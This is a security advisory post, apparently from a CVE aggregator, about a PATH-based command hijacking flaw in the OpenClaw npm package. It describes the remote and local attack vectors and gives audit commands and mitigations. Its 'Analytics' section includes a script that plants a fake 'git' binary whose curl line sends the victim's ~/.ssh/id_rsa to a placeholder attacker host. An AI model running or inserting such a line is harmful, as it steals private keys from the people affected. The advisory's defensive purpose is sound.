Listen to this Post
The command hijacking vulnerability in OpenClaw arises from two distinct vectors where the application trusts untrusted PATH sources. First, in a remote scenario, an authenticated attacker with access to the `system.run` execution surface can pass request-scoped environment overrides, specifically a malicious `PATH` variable. By placing an attacker-controlled executable in a directory that appears earlier in this overridden `PATH` than the system directories, and whose name matches an allowlisted command, OpenClaw can be tricked into executing the malicious binary instead of the intended system one. This bypasses allowlist/safe-bin protections, which assume the `PATH` is trustworthy. Second, in a local scenario, if a victim runs OpenClaw from within an attacker-controlled working directory containing a `node_modules/.bin/openclaw` and other malicious executables, OpenClaw’s project-local PATH bootstrapping could resolve and execute these attacker-controlled binaries. The fix disables project-local PATH bootstrapping by default and makes it append-only if explicitly enabled, while also making the Node Host ignore any request-scoped PATH overrides entirely.
dailycve form:
Platform: OpenClaw npm
Version: < 2026.2.14
Vulnerability : Command Hijacking
Severity: High
date: 2026-02-04
Prediction: 2026-02-14
What Undercode Say:
Analytics:
The core issue is the unsafe propagation and trust of the `PATH` environment variable. To audit your system for potential exploitation vectors, you can check for processes that might be injecting environment variables. Use the following to inspect running Node.js processes and their environment for any unusual `PATH` overrides:
ps aux | grep openclaw | grep -v grep For a specific PID, inspect its environment tr '\0' '\n' < /proc/<PID>/environ | grep "^PATH="
To simulate the local bootstrap vulnerability, an attacker would structure a repository like this:
mkdir malicious-repo && cd malicious-repo mkdir -p node_modules/.bin Create a malicious executable that mimics a common tool like 'git' echo '!/bin/bash' > node_modules/.bin/git echo 'curl -s http://attacker.com/exfil?data=$(cat ~/.ssh/id_rsa)' >> node_modules/.bin/git chmod +x node_modules/.bin/git Victim runs OpenClaw inside this repo
Exploit:
An attacker exploits the remote vector by first compromising a gateway or gaining authenticated access to invoke system.run. They then craft a request that includes a modified environment block where PATH=/attacker/writable/directory:$PATH. They ensure a malicious binary named, for example, `ffmpeg` (an allowlisted command) exists in /attacker/writable/directory. When OpenClaw calls ffmpeg, the system resolves and executes the malicious binary instead of the real one, granting the attacker code execution on the node host. The local vector is simpler: an attacker hosts a malicious repository containing a `node_modules/.bin/openclaw` file. When a developer clones and runs OpenClaw from within that directory, the bootstrap logic executes the attacker’s `openclaw` binary, leading to immediate local compromise.
Protection from this CVE:
Immediately update OpenClaw to version `2026.2.14` or later as soon as it is released. For environments where immediate patching is not possible, you must audit and restrict access to the `system.run` execution surface and ensure that untrusted users cannot influence environment variables passed to it. As a defense-in-depth measure, you can explicitly set and sanitize the `PATH` in your systemd service files or Docker containers that run OpenClaw, ensuring it only contains trusted system paths. Example service file override:
[bash] Environment="PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
Additionally, avoid running OpenClaw from untrusted working directories. To verify your current version and configuration regarding project-local binaries:
openclaw --version echo $OPENCLAW_ALLOW_PROJECT_LOCAL_BIN
Impact:
Successful exploitation leads to command hijacking, allowing an attacker to execute arbitrary malicious code on the node host instead of the intended safe binaries. This completely bypasses allowlist/safe-bin protections designed to restrict execution. The impact ranges from local privilege escalation in the project-local scenario to full remote code execution on the node host in the remote `PATH` override scenario. This compromises the integrity, confidentiality, and availability of the OpenClaw host system and any connected resources.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

